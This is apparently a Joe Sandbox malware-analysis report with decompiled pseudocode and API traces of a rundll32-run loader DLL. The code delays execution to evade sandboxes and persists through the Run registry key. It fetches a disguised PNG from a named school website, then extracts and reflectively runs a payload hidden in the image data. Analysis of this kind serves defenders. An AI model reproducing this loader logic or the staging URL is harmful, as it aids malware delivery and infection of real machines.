Associated: 00000003.00000001.791601940.5ADE1000.00000080.sdmp
Associated: 00000003.00000001.791616802.5ADE3000.00000004.sdmp
Associated: 00000003.00000001.791624248.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_5ade0000_rundll32.jbxd

Function 5ADE1E0C, Relevance: 9.1, APIs: 6, Instructions: 64

C-Code - Quality: 100%

			E5ADE1E0C() {
				int _v8;
				short _v1032;
				WCHAR* _t32;

				_v8 = 0x400;
				if(AssocQueryStringW(0x10, 4, 0x5ade1467, 0,  &_v1032,  &_v8) == 0) {
					_t32 =  &_v1032;
					if(lstrcmpiW(_t32, 0x5ade1471) != 0) {
						if(lstrcmpiW(_t32, 0x5ade1495) != 0) {
							if(lstrcmpiW(_t32, 0x5ade14a5) != 0) {
								if(lstrcmpiW(_t32, 0x5ade14c1) != 0) {
									if(lstrcmpiW(_t32, 0x5ade14cf) != 0) {
										return 0;
									}
									return 5;
								}
								return 4;
							}
							return 3;
						}
						return 2;
					}
					return 1;
				}
				return 0xffffffff;
			}

0x5ade1e15
0x5ade1e3b
0x5ade1e47
0x5ade1e5b
0x5ade1e77
0x5ade1e93
0x5ade1eaf
0x5ade1ecb
0x00000000
0x5ade1ede
0x00000000
0x5ade1ed2
0x00000000
0x5ade1eb6
0x00000000
0x5ade1e9a
0x00000000
0x5ade1e7e
0x00000000
0x5ade1e62
0x00000000

APIs

AssocQueryStringW.SHLWAPI(00000010,00000004,5ADE1467,00000000,?,00000400), ref: 5ADE1E33
lstrcmpiW.KERNEL32(?,5ADE1471), ref: 5ADE1E53
lstrcmpiW.KERNEL32(?,5ADE1495), ref: 5ADE1E6F
lstrcmpiW.KERNEL32(?,5ADE14A5), ref: 5ADE1E8B
lstrcmpiW.KERNEL32(?,5ADE14C1), ref: 5ADE1EA7
lstrcmpiW.KERNEL32(?,5ADE14CF), ref: 5ADE1EC3

Memory Dump Source

Source File: 00000003.00000001.791601940.5ADE1000.00000080.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000003.00000001.791594880.5ADE0000.00000002.sdmp
Associated: 00000003.00000001.791609688.5ADE2000.00000040.sdmp
Associated: 00000003.00000001.791616802.5ADE3000.00000004.sdmp
Associated: 00000003.00000001.791624248.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_5ade0000_rundll32.jbxd

Analysis Process: rundll32.exe PID: 756 Parent PID: 3208

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	82.1%
Signature Coverage:	27.5%
Total number of Nodes:	425
Total number of Limit Nodes:	27

Executed Functions

Function 63C07590, Relevance: 49.5, APIs: 23, Strings: 5, Instructions: 474

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 63C075A7
SetLastError.KERNEL32(63C01525), ref: 63C075B7
GetLastError.KERNEL32 ref: 63C075C0
VirtualAlloc.KERNELBASE ref: 63C07617
memset.MSVCRT ref: 63C0763B
malloc.MSVCRT ref: 63C07647
memcmp.MSVCRT ref: 63C07696
free.MSVCRT ref: 63C076CF
malloc.MSVCRT ref: 63C07714

Part of subcall function 63C06D50: memcpy.MSVCRT ref: 63C06DA3

Part of subcall function 63C069E0: malloc.MSVCRT ref: 63C069F8

Part of subcall function 63C06AF0: memcpy.MSVCRT ref: 63C06B0E

free.MSVCRT ref: 63C077D5
WaitForMultipleObjects.KERNEL32 ref: 63C07D18

Part of subcall function 63C07070: malloc.MSVCRT ref: 63C070BB
Part of subcall function 63C07070: memset.MSVCRT ref: 63C070D1
Part of subcall function 63C07070: memcpy.MSVCRT ref: 63C070E3
Part of subcall function 63C07070: free.MSVCRT ref: 63C070F9
Part of subcall function 63C07070: malloc.MSVCRT ref: 63C07117
Part of subcall function 63C07070: malloc.MSVCRT ref: 63C0714A

CreateThread.KERNEL32 ref: 63C07980
ResumeThread.KERNELBASE ref: 63C079BA
Sleep.KERNELBASE ref: 63C079CA
WaitForMultipleObjects.KERNEL32 ref: 63C079EE
CloseHandle.KERNEL32 ref: 63C07A0A

Part of subcall function 63C06FD0: free.MSVCRT ref: 63C06FF9
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07006
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07014
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07027
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07036
Part of subcall function 63C06FD0: free.MSVCRT ref: 63C07044

VirtualFree.KERNEL32 ref: 63C07A47

Part of subcall function 63C072F0: FreeLibrary.KERNEL32(?,?,-00000001,-00000001,63C07A55), ref: 63C07316

VirtualFree.KERNEL32 ref: 63C07A79
free.MSVCRT ref: 63C07A85
VirtualAlloc.KERNELBASE ref: 63C07ABF
memcpy.MSVCRT ref: 63C07B01

Part of subcall function 63C07EC0: VirtualAlloc.KERNEL32 ref: 63C07F6D
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C07F90
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C07FDE
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C08094
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C080B7
Part of subcall function 63C07EC0: GetVersionExA.KERNEL32 ref: 63C0813D
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C08186
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C081A4
Part of subcall function 63C07EC0: wcslen.MSVCRT ref: 63C081C0
Part of subcall function 63C07EC0: wcslen.MSVCRT ref: 63C081D7
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C081F0
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C08221
Part of subcall function 63C07EC0: wcsrchr.MSVCRT ref: 63C08234
Part of subcall function 63C07EC0: wcscat.MSVCRT ref: 63C08265
Part of subcall function 63C07EC0: wcscat.MSVCRT ref: 63C08274
Part of subcall function 63C07EC0: FindResourceA.KERNEL32 ref: 63C08338
Part of subcall function 63C07EC0: CreateActCtxA.KERNEL32 ref: 63C08354
Part of subcall function 63C07EC0: ActivateActCtx.KERNEL32 ref: 63C0836D
Part of subcall function 63C07EC0: LoadLibraryA.KERNEL32 ref: 63C083B6
Part of subcall function 63C07EC0: GetProcAddress.KERNEL32 ref: 63C0840C
Part of subcall function 63C07EC0: VirtualFree.KERNEL32 ref: 63C08450
Part of subcall function 63C07EC0: FindResourceA.KERNEL32 ref: 63C0846D
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C084A1
Part of subcall function 63C07EC0: VirtualAlloc.KERNEL32 ref: 63C08502
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C085BE
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C085D7
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C0866E
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C086B2

VirtualFree.KERNEL32 ref: 63C07B67

Part of subcall function 63C06A50: memset.MSVCRT ref: 63C06A6F
Part of subcall function 63C06A50: free.MSVCRT(?,?,?,00022620,63C07CE7), ref: 63C06A79

Part of subcall function 63C071E0: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,5ADE2570,?,?,63C075DE), ref: 63C071F6
Part of subcall function 63C071E0: LoadLibraryA.KERNEL32 ref: 63C0726F
Part of subcall function 63C071E0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,5ADE2570,?,?,63C075DE), ref: 63C072A6

ExitProcess.KERNEL32 ref: 63C07D2D

Strings

n, xrefs: 63C076F6
), xrefs: 63C0770A
, xrefs: 63C0784C
(, xrefs: 63C07700
[, xrefs: 63C076FB

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 5ADE2580, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 178

C-Code - Quality: 76%

			E5ADE2580() {
				char _v1028;
				short _v3076;
				short _v5124;
				long _v5128;
				char _v5132;
				char _v5136;
				void _v5648;
				void* __ebx;
				void* __esi;
				void* _t34;
				void* _t35;
				void* _t42;
				void* _t47;
				void _t48;
				struct HINSTANCE__* _t53;
				void* _t54;
				void* _t58;
				WCHAR* _t60;
				WCHAR* _t62;
				signed int _t64;
				signed int _t74;
				WCHAR* _t82;
				void* _t83;

				_v5128 = GetTickCount();
				do {
					Sleep(2); // executed
				} while (GetTickCount() - _v5128 < 0x13880);
				SetUnhandledExceptionFilter(E5ADE27FA);
				if(GetModuleFileNameW( *0x5ade256c,  &_v3076, 0x400) == 0) {
					L9:
					E5ADE24ED(); // executed
					_t34 = E5ADE233B(); // executed
					__eflags = _t34;
					if(_t34 == 0) {
						L23:
						return _t34;
					}
					_t35 = E5ADE240D(); // executed
					__eflags = _t35 - 0xffffffff;
					if(_t35 == 0xffffffff) {
						GetModuleFileNameA( *0x5ade256c,  &_v5124, 0x400);
						wsprintfA( &_v1028, "rundll32 \"%s\", #2",  &_v5124);
						WinExec( &_v1028, 0);
						ExitProcess(0);
					}
					_t42 = VirtualAlloc(0, 0xa00000, 0x3000, 4); // executed
					_t34 = _t42;
					__eflags = _t34;
					if(__eflags == 0) {
						goto L23;
					}
					 *0x5ade1e08 = _t34;
					asm("cld");
					memset( &_v5648, 0, 0x100 << 0);
					_t71 =  &_v5648;
					E5ADE1EE6( &_v5648,  &_v5136, _t82, __eflags,  &_v5132,  &_v5136,  &_v5132); // executed
					_t47 =  &_v5648;
					__eflags = _v5136 - 2;
					if(_v5136 != 2) {
						_t47 = 0;
						_t71 = 0;
						__eflags = L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6";
						if(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6" != 0) {
							_t71 = L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6";
						}
					}
					_t34 = E5ADE1032(_t71, L"www.diefenbachgymnasium.at", L"/sites/all/themes/diefenbach/small_logo.png",  *0x5ade1e08, 0xa00000, E5ADE1E04, _t47); // executed
					__eflags =  *E5ADE1E04;
					if( *E5ADE1E04 == 0) {
						goto L23;
					} else {
						_t83 =  *0x5ade1e08; // 0x16e0000
						asm("repe cmpsb");
						__eflags = 8;
						if(8 != 0) {
							goto L23;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t48 =  *_t83;
							asm("bswap eax");
							__eflags =  *((intOrPtr*)(_t48 + _t83 + 0x10)) - 0x54414449;
							if( *((intOrPtr*)(_t48 + _t83 + 0x10)) == 0x54414449) {
								break;
							}
							_t83 = _t83 + _t48 + 0xc;
						}
						_push(_t48);
						E5ADE161A(_t83 + 8, _t48, 0x5ade1b1d);
						 *0x5ade170a = GetProcAddress;
						GetModuleHandleA(0);
						_t53 =  *0x5ade256c; // 0x5ade0000
						_t54 = E5ADE18DF(__eflags, _t53, _t83 + 8, 0, 0); // executed
						_t34 = _t54;
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						 *_t34(8, 1, E5ADE2570);
						_t34 = E5ADE250C("processes_other_side_lower", 8);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						_t58 = CreateThread(0, 0, _t34, 0, 0, 0); // executed
						_t34 = _t58;
						__eflags = _t34;
						if(_t34 == 0) {
							goto L23;
						}
						return WaitForSingleObject(_t34, 0xffffffff);
					}
				}
				_t60 =  &_v5124;
				__imp__SHGetSpecialFolderPathW(0, _t60, 0x10, 0); // executed
				if(_t60 == 0) {
					L5:
					_t62 =  &_v3076;
					 *0x5ade257c = _t62;
					PathRemoveExtensionW(_t62);
					_t64 = lstrlenW( &_v3076);
					_t74 = _t64;
					_t82 =  &_v3076;
					while( *((short*)(_t82 + _t74 * 2)) != 0x5c) {
						_t74 = _t74 - 1;
						asm("jecxz 0x10");
					}
					_t34 = _t64 - _t74 - 1;
					__eflags = _t34 - 0x20;
					if(_t34 == 0x20) {
						goto L23;
					}
					goto L9;
				}
				_t34 = lstrlenW( &_v5124);
				asm("repe cmpsw");
				if(_t34 == 0) {
					goto L23;
				}
				goto L5;
			}

0x5ade2592
0x5ade2598
0x5ade259a
0x5ade25ac
0x5ade25b8
0x5ade25d8
0x5ade2656
0x5ade2656
0x5ade265b
0x5ade2660
0x5ade2663
0x5ade27b4
0x5ade27b4
0x5ade27b4
0x5ade2669
0x5ade266e
0x5ade2671
0x5ade27c7
0x5ade27e0
0x5ade27f2
0x5ade27fc
0x5ade27fc
0x5ade2685
0x5ade268b
0x5ade268b
0x5ade268d
0x00000000
0x00000000
0x5ade2693
0x5ade2698
0x5ade26a6
0x5ade26ae
0x5ade26bd
0x5ade26c2
0x5ade26c8
0x5ade26cf
0x5ade26d1
0x5ade26d3
0x5ade26d5
0x5ade26dd
0x5ade26df
0x5ade26df
0x5ade26dd
0x5ade2700
0x5ade2705
0x5ade270c
0x00000000
0x5ade2712
0x5ade2712
0x5ade2722
0x5ade2724
0x5ade2726
0x00000000
0x00000000
0x00000000
0x00000000
0x5ade272c
0x5ade272c
0x5ade272c
0x5ade272e
0x5ade2730
0x5ade2738
0x00000000
0x00000000
0x5ade273c
0x5ade273c
0x5ade2744
0x5ade274c
0x5ade2757
0x5ade275e
0x5ade2764
0x5ade276f
0x5ade2774
0x5ade2774
0x5ade2776
0x00000000
0x00000000
0x5ade2782
0x5ade278e
0x5ade278e
0x5ade2790
0x00000000
0x00000000
0x5ade279d
0x5ade27a3
0x5ade27a3
0x5ade27a5
0x00000000
0x00000000
0x00000000
0x5ade27aa
0x5ade270c
0x5ade25da
0x5ade25e7
0x5ade25ef
0x5ade2617
0x5ade2617
0x5ade261d
0x5ade2623
0x5ade2630
0x5ade2636
0x5ade2638
0x5ade263e
0x5ade2645
0x5ade2646
0x5ade2646
0x5ade264c
0x5ade264d
0x5ade2650
0x00000000
0x00000000
0x00000000
0x5ade2650
0x5ade25f8
0x5ade260c
0x5ade2611
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 5ADE258C
Sleep.KERNELBASE(00000002), ref: 5ADE259A
GetTickCount.KERNEL32 ref: 5ADE25A0
SetUnhandledExceptionFilter.KERNEL32(#5), ref: 5ADE25B8
GetModuleFileNameW.KERNEL32(?,00000400), ref: 5ADE25D0
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 5ADE25E7
lstrlenW.KERNEL32(?), ref: 5ADE25F8
PathRemoveExtensionW.SHLWAPI(?), ref: 5ADE2623
lstrlenW.KERNEL32(?), ref: 5ADE2630

Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384
Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Part of subcall function 5ADE240D: GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE2428
Part of subcall function 5ADE240D: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,0002001B,?), ref: 5ADE2446
Part of subcall function 5ADE240D: wsprintfA.USER32 ref: 5ADE2467
Part of subcall function 5ADE240D: RegQueryValueExA.KERNEL32(?,#3,00000000,00000000,?,?), ref: 5ADE248C
Part of subcall function 5ADE240D: lstrcmpiA.KERNEL32(?,?), ref: 5ADE24A4
Part of subcall function 5ADE240D: lstrlenA.KERNEL32(?), ref: 5ADE24B5
Part of subcall function 5ADE240D: RegSetValueExA.ADVAPI32(?,#3,00000000,00000001,?,00000000), ref: 5ADE24D4
Part of subcall function 5ADE240D: RegCloseKey.ADVAPI32(?,-00000001), ref: 5ADE24E4

VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000004), ref: 5ADE2685

Part of subcall function 5ADE1032: StrStrA.SHLWAPI(00000000,accepted-), ref: 5ADE1201
Part of subcall function 5ADE1032: StrToIntA.SHLWAPI(00000000), ref: 5ADE1268
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE1284
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE1299
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE12B3
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE12D4
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE12E9
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE1303
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(?,00000000,00008000), ref: 5ADE13A3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 5ADE13B3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00008000), ref: 5ADE13E1

GetModuleHandleA.KERNEL32(00000000,00000000,5ADE1B1D,00000000,?,www.diefenbachgymnasium.at,/sites/all/themes/diefenbach/small_logo.png,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE275E
#1.AZGYRFHY(?,00000001,5ADE2570,5ADE0000,016DFFF8,00000000,00000000,?,www.diefenbachgymnasium.at,/sites/all/themes/diefenbach/small_logo.png,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE2789

Part of subcall function 5ADE250C: lstrcmpA.KERNEL32(?,00000000,00000000,?), ref: 5ADE253A

CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 5ADE279D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 5ADE27AA
GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE27C7
wsprintfA.USER32 ref: 5ADE27E0
WinExec.KERNEL32(?,00000000), ref: 5ADE27F2

Strings

IDAT, xrefs: 5ADE2730
www.diefenbachgymnasium.at, xrefs: 5ADE26FA
processes_other_side_lower, xrefs: 5ADE2784
rundll32 "%s", #2, xrefs: 5ADE27DA
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6, xrefs: 5ADE26D5, 5ADE26DF, 5ADE26FF
/sites/all/themes/diefenbach/small_logo.png, xrefs: 5ADE26F5

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 00221179, Relevance: 18.2, APIs: 12, Instructions: 205

APIs

Sleep.KERNEL32 ref: 00221211

Part of subcall function 00235D00: VirtualQuery.KERNEL32 ref: 00235E97
Part of subcall function 00235D00: VirtualProtect.KERNEL32 ref: 00235EC8
Part of subcall function 00235D00: signal.MSVCRT ref: 0023600A
Part of subcall function 00235D00: signal.MSVCRT ref: 0023606F
Part of subcall function 00235D00: signal.MSVCRT ref: 002360AF
Part of subcall function 00235D00: signal.MSVCRT ref: 002360C8
Part of subcall function 00235D00: signal.MSVCRT ref: 002360EE
Part of subcall function 00235D00: signal.MSVCRT ref: 0023611F
Part of subcall function 00235D00: signal.MSVCRT ref: 0023613F
Part of subcall function 00235D00: signal.MSVCRT ref: 0023615F

SetUnhandledExceptionFilter.KERNEL32 ref: 00221292
malloc.MSVCRT ref: 0022134A
strlen.MSVCRT ref: 0022136A
malloc.MSVCRT ref: 00221375
memcpy.MSVCRT ref: 00221391

Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239E35
Part of subcall function 00239E10: GdiplusStartup.GDIPLUS ref: 00239E98
Part of subcall function 00239E10: Sleep.KERNELBASE ref: 00239EE7
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239EF0
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239F69
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239F71
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239F85
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 00239FA7
Part of subcall function 00239E10: Sleep.KERNEL32 ref: 00239FDF
Part of subcall function 00239E10: Sleep.KERNEL32 ref: 0023A01D
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 0023A033
Part of subcall function 00239E10: Sleep.KERNEL32 ref: 0023A04F
Part of subcall function 00239E10: Sleep.KERNEL32 ref: 0023A069
Part of subcall function 00239E10: GetTickCount.KERNEL32 ref: 0023A074
Part of subcall function 00239E10: calloc.MSVCRT ref: 0023A0FF
Part of subcall function 00239E10: MultiByteToWideChar.KERNEL32 ref: 0023A12C
Part of subcall function 00239E10: free.MSVCRT ref: 0023A169
Part of subcall function 00239E10: free.MSVCRT ref: 0023A177
Part of subcall function 00239E10: free.MSVCRT ref: 0023A21A
Part of subcall function 00239E10: free.MSVCRT ref: 0023A225
Part of subcall function 00239E10: lstrlenW.KERNEL32 ref: 0023A24D
Part of subcall function 00239E10: lstrlenW.KERNEL32 ref: 0023A290

_cexit.MSVCRT ref: 002213FF
_amsg_exit.MSVCRT ref: 0022142B
_initterm.MSVCRT ref: 0022144D
GetStartupInfoA.KERNEL32 ref: 00221473
_initterm.MSVCRT ref: 0022149A
exit.MSVCRT ref: 002214AE

Part of subcall function 00235740: GetSystemTimeAsFileTime.KERNEL32 ref: 00235779
Part of subcall function 00235740: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 0023578A
Part of subcall function 00235740: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 00235792
Part of subcall function 00235740: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 0023579A
Part of subcall function 00235740: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,002214F2), ref: 002357A9

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 5ADE256D, Relevance: 13.6, APIs: 9, Instructions: 66

C-Code - Quality: 72%

			E5ADE256D(intOrPtr* __eax, void* __ebx, void* __edx) {
				intOrPtr _v119;
				char _v1028;
				short _v3076;
				long _v5120;
				short _v5124;
				intOrPtr _v5128;
				char _v5132;
				char _v5136;
				void _v5648;
				void* __esi;
				void* _t38;
				void* _t39;
				void* _t46;
				short* _t51;
				void _t52;
				struct HINSTANCE__* _t57;
				void* _t58;
				void* _t62;
				WCHAR* _t63;
				WCHAR* _t65;
				signed int _t67;
				signed int _t79;
				void* _t84;
				WCHAR* _t92;
				void* _t94;

				_pop(_t84);
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_pop(ds);
				_v119 = _v119 + _t84;
				_push(_t92);
				_push(__ebx);
				_v5120 = GetTickCount();
				do {
					Sleep(2); // executed
				} while (GetTickCount() - _v5128 < 0x13880);
				SetUnhandledExceptionFilter(E5ADE27FA);
				if(GetModuleFileNameW( *0x5ade256c,  &_v3076, 0x400) == 0) {
					L11:
					E5ADE24ED(); // executed
					_t38 = E5ADE233B(); // executed
					__eflags = _t38;
					if(_t38 == 0) {
						L25:
						return _t38;
					}
					_t39 = E5ADE240D(); // executed
					__eflags = _t39 - 0xffffffff;
					if(_t39 == 0xffffffff) {
						GetModuleFileNameA( *0x5ade256c,  &_v5124, 0x400);
						wsprintfA( &_v1028, "rundll32 \"%s\", #2",  &_v5124);
						WinExec( &_v1028, 0);
						ExitProcess(0);
					}
					_t46 = VirtualAlloc(0, 0xa00000, 0x3000, 4); // executed
					_t38 = _t46;
					__eflags = _t38;
					if(__eflags == 0) {
						goto L25;
					}
					 *0x5ade1e08 = _t38;
					asm("cld");
					memset( &_v5648, 0, 0x100 << 0);
					_t76 =  &_v5648;
					E5ADE1EE6( &_v5648,  &_v5136, _t92, __eflags,  &_v5132,  &_v5136,  &_v5132); // executed
					_t51 =  &_v5648;
					__eflags = _v5136 - 2;
					if(_v5136 != 2) {
						_t51 = 0;
						_t76 = 0;
						__eflags = L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6";
						if(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6" != 0) {
							_t76 = L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6";
						}
					}
					_t38 = E5ADE1032(_t76, L"www.diefenbachgymnasium.at", L"/sites/all/themes/diefenbach/small_logo.png",  *0x5ade1e08, 0xa00000, E5ADE1E04, _t51); // executed
					__eflags =  *E5ADE1E04;
					if( *E5ADE1E04 != 0) {
						_t94 =  *0x5ade1e08; // 0x16e0000
						asm("repe cmpsb");
						__eflags = 8;
						if(8 != 0) {
							goto L25;
						} else {
							goto L19;
						}
						while(1) {
							L19:
							_t52 =  *_t94;
							asm("bswap eax");
							__eflags =  *((intOrPtr*)(_t52 + _t94 + 0x10)) - 0x54414449;
							if( *((intOrPtr*)(_t52 + _t94 + 0x10)) == 0x54414449) {
								break;
							}
							_t94 = _t94 + _t52 + 0xc;
						}
						_push(_t52);
						E5ADE161A(_t94 + 8, _t52, 0x5ade1b1d);
						 *0x5ade170a = GetProcAddress;
						GetModuleHandleA(0);
						_t57 =  *0x5ade256c; // 0x5ade0000
						_t58 = E5ADE18DF(__eflags, _t57, _t94 + 8, 0, 0); // executed
						_t38 = _t58;
						__eflags = _t38;
						if(_t38 != 0) {
							 *_t38(8, 1, E5ADE2570);
							_t38 = E5ADE250C("processes_other_side_lower", 8);
							__eflags = _t38;
							if(_t38 != 0) {
								_t62 = CreateThread(0, 0, _t38, 0, 0, 0); // executed
								_t38 = _t62;
								__eflags = _t38;
								if(_t38 != 0) {
									_t38 = WaitForSingleObject(_t38, 0xffffffff);
								}
							}
						}
					}
					goto L25;
				}
				_t63 =  &_v5124;
				__imp__SHGetSpecialFolderPathW(0, _t63, 0x10, 0); // executed
				if(_t63 == 0) {
					L7:
					_t65 =  &_v3076;
					 *0x5ade257c = _t65;
					PathRemoveExtensionW(_t65);
					_t67 = lstrlenW( &_v3076);
					_t79 = _t67;
					_t92 =  &_v3076;
					while( *((short*)(_t92 + _t79 * 2)) != 0x5c) {
						_t79 = _t79 - 1;
						asm("jecxz 0x10");
					}
					_t38 = _t67 - _t79 - 1;
					__eflags = _t38 - 0x20;
					if(_t38 == 0x20) {
						goto L25;
					}
					goto L11;
				}
				_t38 = lstrlenW( &_v5124);
				asm("repe cmpsw");
				if(_t38 == 0) {
					goto L25;
				}
				goto L7;
			}

0x5ade256f
0x5ade2570
0x5ade2572
0x5ade2574
0x5ade2576
0x5ade2578
0x5ade257a
0x5ade257e
0x5ade257f
0x5ade2589
0x5ade258b
0x5ade2592
0x5ade2598
0x5ade259a
0x5ade25ac
0x5ade25b8
0x5ade25d8
0x5ade2656
0x5ade2656
0x5ade265b
0x5ade2660
0x5ade2663
0x5ade27b0
0x5ade27b4
0x5ade27b4
0x5ade2669
0x5ade266e
0x5ade2671
0x5ade27c7
0x5ade27e0
0x5ade27f2
0x5ade27fc
0x5ade27fc
0x5ade2685
0x5ade268b
0x5ade268b
0x5ade268d
0x00000000
0x00000000
0x5ade2693
0x5ade2698
0x5ade26a6
0x5ade26ae
0x5ade26bd
0x5ade26c2
0x5ade26c8
0x5ade26cf
0x5ade26d1
0x5ade26d3
0x5ade26d5
0x5ade26dd
0x5ade26df
0x5ade26df
0x5ade26dd
0x5ade2700
0x5ade2705
0x5ade270c
0x5ade2712
0x5ade2722
0x5ade2724
0x5ade2726
0x00000000
0x00000000
0x00000000
0x00000000
0x5ade272c
0x5ade272c
0x5ade272c
0x5ade272e
0x5ade2730
0x5ade2738
0x00000000
0x00000000
0x5ade273c
0x5ade273c
0x5ade2744
0x5ade274c
0x5ade2757
0x5ade275e
0x5ade2764
0x5ade276f
0x5ade2774
0x5ade2774
0x5ade2776
0x5ade2782
0x5ade278e
0x5ade278e
0x5ade2790
0x5ade279d
0x5ade27a3
0x5ade27a3
0x5ade27a5
0x5ade27aa
0x5ade27aa
0x5ade27a5
0x5ade2790
0x5ade2776
0x00000000
0x5ade270c
0x5ade25da
0x5ade25e7
0x5ade25ef
0x5ade2617
0x5ade2617
0x5ade261d
0x5ade2623
0x5ade2630
0x5ade2636
0x5ade2638
0x5ade263e
0x5ade2645
0x5ade2646
0x5ade2646
0x5ade264c
0x5ade264d
0x5ade2650
0x00000000
0x00000000
0x00000000
0x5ade2650
